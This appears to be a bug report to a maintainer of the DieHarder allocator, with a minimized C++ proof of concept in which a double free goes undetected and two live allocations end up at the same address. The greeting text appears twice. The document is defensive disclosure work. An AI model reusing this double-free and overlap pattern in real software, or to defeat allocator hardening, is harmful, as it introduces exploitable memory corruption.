Hi Emery,
This is the issue for Dieharder that we discussed.
I am opening this issue to keep track of it for further discussion.
I have also attached the PoC that you further minimized.
Thank you.
#include <iostream>
using namespace std;
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifndef __APPLE__
#include <malloc.h>
#endif
#include <assert.h>
// Allocation slots handed out by the PoC in main(); static storage, so every
// entry starts out null.
void* p[256]{};
// Declared next to p but not referenced anywhere in the PoC below.
uintptr_t buf[256]{};
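int main() {
// Reproducer for a double free that the allocator under test does not
// reject: after the second free(p[2]) below, two live allocations end up at
// the same address, which is exactly what the final assert checks. The
// specific sizes look chosen to land in one size class / large-object path
// of the allocator -- TODO confirm with the reporter.
#ifndef __APPLE__
// Allocated and deliberately never freed (see the commented-out free below);
// presumably shapes the heap so the overlap reproduces -- confirm.
p[1] = malloc((65536 + 16) / 2);
#endif
p[2] = malloc(65536 + 16);
free(p[2]);
p[4] = malloc(0x30000);
////// free(p[1]);
// Sanity check that p[4] is a distinct live block, so the free(p[2]) below is
// a genuine double free and not a release of p[4]'s memory.
// (Emery: the original assertion repeated this clause; one is enough.)
assert(p[2] != p[4]);
// [VULN] Double free -- p[2] was already released above. A hardened allocator
// is expected to detect this and abort; the report is that it does not.
free(p[2]);
///p[5] = malloc(65536);
p[6] = malloc(65536 + 16);
free(p[4]);
p[7] = malloc(65536 + 16);
// [BUG] Found overlap: two live allocations share one address, e.g.
// p[7]=0x7f52347c4000 (size=65568), p[6]=0x7f52347c4000 (size=65552)
// endl (not '\n') so the addresses are flushed before a possible abort().
std::cout << p[6] << ", " << p[7] << std::endl;
// The PoC reproduces the bug only when both slots hold the same address.
assert(p[6] == p[7]);
return 0;
}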
Hi Emery,
This is the issue for Dieharder that we discussed.
I am opening this issue to keep track of it for further discussion.
I have also attached the PoC that you further minimized.
Thank you.